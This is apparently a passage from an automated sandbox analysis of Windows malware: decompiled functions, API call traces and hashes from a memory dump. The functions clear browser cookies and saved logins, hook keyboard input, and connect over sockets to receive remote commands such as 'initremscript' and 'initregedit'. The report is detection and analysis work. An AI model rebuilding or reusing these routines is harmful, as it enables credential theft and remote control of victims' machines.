                                          				return _a4;
                                          			}















                                          0x0040ee57
                                          0x0040ee60
                                          0x0040ee61
                                          0x0040ee65
                                          0x0040ee6b
                                          0x0040ee6d
                                          0x0040ee73
                                          0x0040ee75
                                          0x0040ee7f
                                          0x0040ee84
                                          0x0040ee87
                                          0x0040ee8d
                                          0x0040ee95
                                          0x0040ee98
                                          0x0040eea3
                                          0x0040eea9
                                          0x0040eeb0
                                          0x0040eebd
                                          0x0040eec6
                                          0x0040eed3

                                          APIs
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,7313CB00,7313CB00,?,0040C5C2,?,00000000), ref: 0040EE57
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EE65
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,0040C5C2,?,00000000), ref: 0040EE87
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,0040C5C2,?,00000000), ref: 0040EEA9
                                            • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,0040C5C2,?,00000000), ref: 0040EEBD
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040C5C2,?,00000000), ref: 0040EEC6
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@free
                                          • String ID:
                                          • API String ID: 1231779380-0
                                          • Opcode ID: 8d267b30505027ac71a5795a797b7f15db73b80b7f14e4256d31203b5d1ac008
                                          • Instruction ID: b993cd5d2c3ead3800f1df18077c746f948359e482093e15d73946b3c0281b93
                                          • Opcode Fuzzy Hash: 8d267b30505027ac71a5795a797b7f15db73b80b7f14e4256d31203b5d1ac008
                                          • Instruction Fuzzy Hash: 8F01803220011D9BCB18EB78EC998EF77AAFB88265740443DF907D7290EE709D45CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 41%
                                          			E00405E72(void* __ecx) {
                                          				char _v5;
                                          				char _v6;
                                          				char _v7;
                                          				char _v8;
                                          				char _v9;
                                          				void* _t33;
                                          				intOrPtr _t65;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				 *0x41576a = 1;
                                          				Sleep( *0x415764);
                                          				_v5 = 0;
                                          				_v6 = 0;
                                          				_v7 = 0;
                                          				_v9 = 0;
                                          				_v8 = 0;
                                          				do {
                                          					if(_v5 == 0) {
                                          						L2:
                                          						_v5 = E00405D53();
                                          					}
                                          					if(_v6 == 0) {
                                          						_v6 = E00405AFB();
                                          					}
                                          					if(_v9 == 0) {
                                          						_v9 = E004057B6();
                                          					}
                                          					if(_v7 == 0) {
                                          						_v7 = E004056EC();
                                          					}
                                          					if(_v8 == 0) {
                                          						_v8 = E00405622();
                                          					}
                                          					if(_v5 == 0 || _v6 == 0 || _v7 == 0 || _v8 == 0 || _v9 == 0) {
                                          						Sleep(0x1388);
                                          					}
                                          					if(_v5 == 0) {
                                          						goto L2;
                                          					}
                                          				} while (_v6 == 0 || _v7 == 0 || _v8 == 0 || _v9 == 0);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("\n[Cleared all cookies & stored logins!]\n",  &_v9, 0);
                                          				_t33 = E00403A9A(0x4156c0);
                                          				_t65 =  *0x415760; // 0x0
                                          				if(_t65 != 0) {
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					E00409046(0x80000001, _t33, "FR", 1);
                                          				}
                                          				 *0x41576a = 0;
                                          				return 0;
                                          			}










                                          0x00405e75
                                          0x00405e76
                                          0x00405e85
                                          0x00405e8c
                                          0x00405e90
                                          0x00405e93
                                          0x00405e96
                                          0x00405e99
                                          0x00405e9c
                                          0x00405e9f
                                          0x00405ea2
                                          0x00405ea4
                                          0x00405ea9
                                          0x00405ea9
                                          0x00405eaf
                                          0x00405eb6
                                          0x00405eb6
                                          0x00405ebc
                                          0x00405ec3
                                          0x00405ec3
                                          0x00405ec9
                                          0x00405ed0
                                          0x00405ed0
                                          0x00405ed6
                                          0x00405edd
                                          0x00405edd
                                          0x00405ee3
                                          0x00405efe
                                          0x00405efe
                                          0x00405f03
                                          0x00000000
                                          0x00000000
                                          0x00405f05
                                          0x00405f28
                                          0x00405f33
                                          0x00405f38
                                          0x00405f3e
                                          0x00405f4c
                                          0x00405f58
                                          0x00405f5d
                                          0x00405f60
                                          0x00405f6b

                                          APIs
                                          • Sleep.KERNEL32 ref: 00405E8C
                                          • Sleep.KERNEL32(00001388), ref: 00405EFE
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared all cookies & stored logins!],?), ref: 00405F28
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410D48,00000001), ref: 00405F4C
                                            • Part of subcall function 00405D53: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000), ref: 00405D64
                                            • Part of subcall function 00405D53: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00405D8B
                                            • Part of subcall function 00405D53: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405D94
                                            • Part of subcall function 00405D53: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00405DA3
                                            • Part of subcall function 00405D53: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],?), ref: 00405E1A
                                            • Part of subcall function 00405D53: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405E67
                                          Strings
                                          • [Cleared all cookies & stored logins!], xrefs: 00405F23
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@Sleep$??4?$basic_string@??8std@@?c_str@?$basic_string@D@2@@0@V01@V01@@V?$basic_string@
                                          • String ID: [Cleared all cookies & stored logins!]
                                          • API String ID: 3797260644-1894301085
                                          • Opcode ID: f199ca515fe3fd297484eb2075cc4a307752a8c1ca9959e62230d6bf913dfe67
                                          • Instruction ID: 743c0b0ad3dce683d62215772fc1dcfb9b2edba61c8a76df2461d73b0dcd023a
                                          • Opcode Fuzzy Hash: f199ca515fe3fd297484eb2075cc4a307752a8c1ca9959e62230d6bf913dfe67
                                          • Instruction Fuzzy Hash: 8F31F461D4A7C8B9EB12E3F555165DF7E748E12200B48C4FFD4C077283D57A0B48976A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 71%
                                          			E0040F978() {
                                          				char _v20;
                                          				struct _WNDCLASSEXA _v68;
                                          				struct HWND__* _t21;
                                          				signed int _t23;
                                          
                                          				_t23 = 0xb;
                                          				memset( &(_v68.style), 0, _t23 << 2);
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsw");
                                          				_v68.cbSize = 0x30;
                                          				asm("movsb");
                                          				_v68.lpszClassName =  &_v20;
                                          				_v68.style = 0;
                                          				_v68.lpfnWndProc = E0040F9EF;
                                          				_v68.cbClsExtra = 0;
                                          				_v68.cbWndExtra = 0;
                                          				_v68.lpszMenuName = 0;
                                          				if(RegisterClassExA( &_v68) == 0) {
                                          					L3:
                                          					return 0;
                                          				}
                                          				_t21 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
                                          				if(_t21 == 0) {
                                          					GetLastError();
                                          					goto L3;
                                          				}
                                          				return _t21;
                                          			}







                                          0x0040f984
                                          0x0040f988
                                          0x0040f992
                                          0x0040f993
                                          0x0040f994
                                          0x0040f995
                                          0x0040f99a
                                          0x0040f9a1
                                          0x0040f9a2
                                          0x0040f9ab
                                          0x0040f9ae
                                          0x0040f9b5
                                          0x0040f9b8
                                          0x0040f9bb
                                          0x0040f9c7
                                          0x0040f9e9
                                          0x00000000
                                          0x0040f9e9
                                          0x0040f9d9
                                          0x0040f9e1
                                          0x0040f9e3
                                          0x00000000
                                          0x0040f9e3
                                          0x0040f9ee

                                          APIs
                                          • RegisterClassExA.USER32(00000030), ref: 0040F9BE
                                          • CreateWindowExA.USER32 ref: 0040F9D9
                                          • GetLastError.KERNEL32(?,00000000), ref: 0040F9E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ClassCreateErrorLastRegisterWindow
                                          • String ID: 0$MsgWindowClass
                                          • API String ID: 2877667751-2410386613
                                          • Opcode ID: 4b35dbec49bb3aac694837bfd24467ddf9e7bcdb7fb055d8e4ccf1cf56f59604
                                          • Instruction ID: 3bd77cc2a02a113e4efc25ff9f0a79e0b482d680b5cc203598e7dfc1cb382988
                                          • Opcode Fuzzy Hash: 4b35dbec49bb3aac694837bfd24467ddf9e7bcdb7fb055d8e4ccf1cf56f59604
                                          • Instruction Fuzzy Hash: 93015AB1D01228AACB21DF96EC48ADFBFBDEF45760F004126F510B6280D7B05549CBE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 17%
                                          			E0040D18E(void* __eflags, char _a4) {
                                          				char _v20;
                                          				char* _t8;
                                          				void* _t10;
                                          				void* _t21;
                                          
                                          				E00402109(0x415a78);
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				E00402168(0x415a78);
                                          				_t8 =  &_v20;
                                          				L0040FC1A();
                                          				L0040FC14();
                                          				E00402198(0x415a78, _t21);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t8, _t8, "initremscript", 0x415268,  &_a4);
                                          				_t10 = E0040221C(0x415a78, E0040D3A5, 1);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _t10;
                                          			}







                                          0x0040d19e
                                          0x0040d1af
                                          0x0040d1b0
                                          0x0040d1b1
                                          0x0040d1b2
                                          0x0040d1b3
                                          0x0040d1c6
                                          0x0040d1cf
                                          0x0040d1d9
                                          0x0040d1e3
                                          0x0040d1eb
                                          0x0040d1fa
                                          0x0040d202
                                          0x0040d20c

                                          APIs
                                            • Part of subcall function 00402109: socket.WS2_32(00000000,00000001,00000006), ref: 00402120
                                            • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,initremscript,00415268,?,?,?,?,?,?,?,?,?,?,?,?,0040BC44), ref: 0040D1CF
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040D1D9
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040D1EB
                                            • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00415A30,00415940,00415268,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E), ref: 0040222E
                                            • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040223B
                                            • Part of subcall function 0040221C: malloc.MSVCRT ref: 00402248
                                            • Part of subcall function 0040221C: recv.WS2_32(00415A30,00000000,00000000,00000000), ref: 00402259
                                            • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040226D
                                            • Part of subcall function 0040221C: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402277
                                            • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402280
                                            • Part of subcall function 0040221C: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040228D
                                            • Part of subcall function 0040221C: free.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022AE
                                            • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D0
                                            • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040D3A5,00000001,?,?,?,?,?,?), ref: 0040D202
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V?$basic_string@$??4?$basic_string@V10@0@V10@@Y?$basic_string@connectfreemallocrecvsocket
                                          • String ID: initremscript
                                          • API String ID: 1984283922-2453072461
                                          • Opcode ID: a3a1c512a8bbe3034cfa995716c64fccf3b81a4b27426af285bb25f05ea61ccc
                                          • Instruction ID: 342a5ca8b5c7f20c834f884bab2930fb133c27a797bcc57ebff7080bfdc51c0c
                                          • Opcode Fuzzy Hash: a3a1c512a8bbe3034cfa995716c64fccf3b81a4b27426af285bb25f05ea61ccc
                                          • Instruction Fuzzy Hash: F5F0A432B4061463D700FAB99D8B9FF7759AA81354B40097EBE016A1C2EAFD9A4C429D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 17%
                                          			E00409D91(void* __eflags, char _a4) {
                                          				char _v20;
                                          				char* _t8;
                                          				void* _t10;
                                          				void* _t21;
                                          
                                          				E00402109(0x4159a8);
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				E00402168(0x4159a8);
                                          				_t8 =  &_v20;
                                          				L0040FC1A();
                                          				L0040FC14();
                                          				E00402198(0x4159a8, _t21);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t8, _t8, "initregedit", 0x415268,  &_a4);
                                          				_t10 = E0040221C(0x4159a8, E0040976B, 0);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _t10;
                                          			}







                                          0x00409da1
                                          0x00409db2
                                          0x00409db3
                                          0x00409db4
                                          0x00409db5
                                          0x00409db6
                                          0x00409dc9
                                          0x00409dd2
                                          0x00409ddc
                                          0x00409de6
                                          0x00409dee
                                          0x00409dfd
                                          0x00409e05
                                          0x00409e0f

                                          APIs
                                            • Part of subcall function 00402109: socket.WS2_32(00000000,00000001,00000006), ref: 00402120
                                            • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,initregedit,00415268,?,?,?,?,?,?,?,?,?,?,?,?,0040BC72), ref: 00409DD2
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00409DDC
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00409DEE
                                            • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00415A30,00415940,00415268,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E), ref: 0040222E
                                            • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040223B
                                            • Part of subcall function 0040221C: malloc.MSVCRT ref: 00402248
                                            • Part of subcall function 0040221C: recv.WS2_32(00415A30,00000000,00000000,00000000), ref: 00402259
                                            • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040226D
                                            • Part of subcall function 0040221C: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402277
                                            • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402280
                                            • Part of subcall function 0040221C: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040228D
                                            • Part of subcall function 0040221C: free.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022AE
                                            • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D0
                                            • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040976B,00000000,?,?,?,?,?,?), ref: 00409E05
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V?$basic_string@$??4?$basic_string@V10@0@V10@@Y?$basic_string@connectfreemallocrecvsocket
                                          • String ID: initregedit
                                          • API String ID: 1984283922-4282871991
                                          • Opcode ID: f30660b3cfbb667e63d0ae3de9153243f20a977a78a5d049d9f4742b7f6f2b8b
                                          • Instruction ID: ea2ab50fb2608594d56e05149f15f1d9e9310a7c1248ba924dfbe77ee24fa733
                                          • Opcode Fuzzy Hash: f30660b3cfbb667e63d0ae3de9153243f20a977a78a5d049d9f4742b7f6f2b8b
                                          • Instruction Fuzzy Hash: E3F0F93260060467C700BA759D4B9EF77189A81314B40047EBD01BB1C3EAFC8D48429D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,?,dt@,00000000), ref: 00402A40
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402A4C
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402A61
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402A6A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                                          • String ID: dt@
                                          • API String ID: 2505548081-2366654348
                                          • Opcode ID: 61a749066b2d00b9c9c648641962aeee84050e9aec5808d4299b9fd5b26a7e54
                                          • Instruction ID: 764d4db823161b876fc7299956acb260e9b2acb34382fd8d294e8e186b4e9337
                                          • Opcode Fuzzy Hash: 61a749066b2d00b9c9c648641962aeee84050e9aec5808d4299b9fd5b26a7e54
                                          • Instruction Fuzzy Hash: B7F0D43150001EEBCF04EF94DC98CEE7B78FB54305B008469B916921A0EBB4AA59CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00403774(void* __ecx, char _a4) {
                                          				void* _t8;
                                          				void* _t16;
                                          
                                          				_t16 = __ecx;
                                          				 *((char*)(__ecx + 0x38)) = 1;
                                          				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_a4);
                                          				E0040374A(__ecx);
                                          				CreateThread(0, 0, E0040382C, __ecx, 0, 0);
                                          				if( *_t16 == 0) {
                                          					CreateThread(0, 0, E0040380C, _t16, 0, 0);
                                          				}
                                          				_t8 = CreateThread(0, 0, E0040383B, _t16, 0, 0);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _t8;
                                          			}





                                          0x00403779
                                          0x00403783
                                          0x00403787
                                          0x0040378f
                                          0x004037a6
                                          0x004037aa
                                          0x004037b6
                                          0x004037b6
                                          0x004037c2
                                          0x004037c7
                                          0x004037d1

                                          APIs
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B043E0,00000000,00415940,?,00407B0B,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00403787
                                            • Part of subcall function 0040374A: GetKeyboardLayout.USER32 ref: 0040374F
                                          • CreateThread.KERNEL32 ref: 004037A6
                                          • CreateThread.KERNEL32 ref: 004037B6
                                          • CreateThread.KERNEL32 ref: 004037C2
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00407B0B,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004037C7
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??4?$basic_string@KeyboardLayoutV01@V01@@
                                          • String ID:
                                          • API String ID: 2295282396-0
                                          • Opcode ID: 14f04f78e8f7430bc4bd69958249ffd5d817d18415e9be8f89f862f13594ae1e
                                          • Instruction ID: 83acec77044f58d1f3a1298fcc2b8004ba63f5c21448a1edded433463e12b57e
                                          • Opcode Fuzzy Hash: 14f04f78e8f7430bc4bd69958249ffd5d817d18415e9be8f89f862f13594ae1e
                                          • Instruction Fuzzy Hash: 46F090721002947AC231AB239C8CDEB3FBCDAD7F65710807EF44612181CAB89945C2B9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040388F
                                          • SetWindowsHookExA.USER32 ref: 0040389D
                                          • GetMessageA.USER32 ref: 004038B2
                                          • TranslateMessage.USER32(?), ref: 004038BC
                                          • DispatchMessageA.USER32 ref: 004038C6
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Message$DispatchHandleHookModuleTranslateWindows
                                          • String ID:
                                          • API String ID: 521483645-0
                                          • Opcode ID: 9f2d6cb336974f6d21199ad434600dc08e561f79de4f796117326006807f6229
                                          • Instruction ID: 353822e126b8fa7368d95cd0bef129b561c7f90acebca083c61d1e8d62fd4680
                                          • Opcode Fuzzy Hash: 9f2d6cb336974f6d21199ad434600dc08e561f79de4f796117326006807f6229
                                          • Instruction Fuzzy Hash: 7CF04473900149BBD720AFA59C48DEB7FFCEBC5B11B00847ABA41E2154D6789545CB74
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040EF60
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040EF72
                                          • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0040EF7E
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040EF9F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EFA8
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?length@?$basic_string@A?$basic_string@D@1@@V01@@
                                          • String ID:
                                          • API String ID: 1435062097-0
                                          • Opcode ID: 20075cc94b158e45fadc6d86183d5be30a195f63fcca5debc30167b5daaf2194
                                          • Instruction ID: 6b6ba2759fc20d09fe660d68a9c76a1e637e25a4b848d32c772961ab34e95e59
                                          • Opcode Fuzzy Hash: 20075cc94b158e45fadc6d86183d5be30a195f63fcca5debc30167b5daaf2194
                                          • Instruction Fuzzy Hash: CE019E7540015AEFCB008F64DC889EE7BB8FF48314F008455EC5697280DA749A44CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403701
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040370E
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040371B
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403728
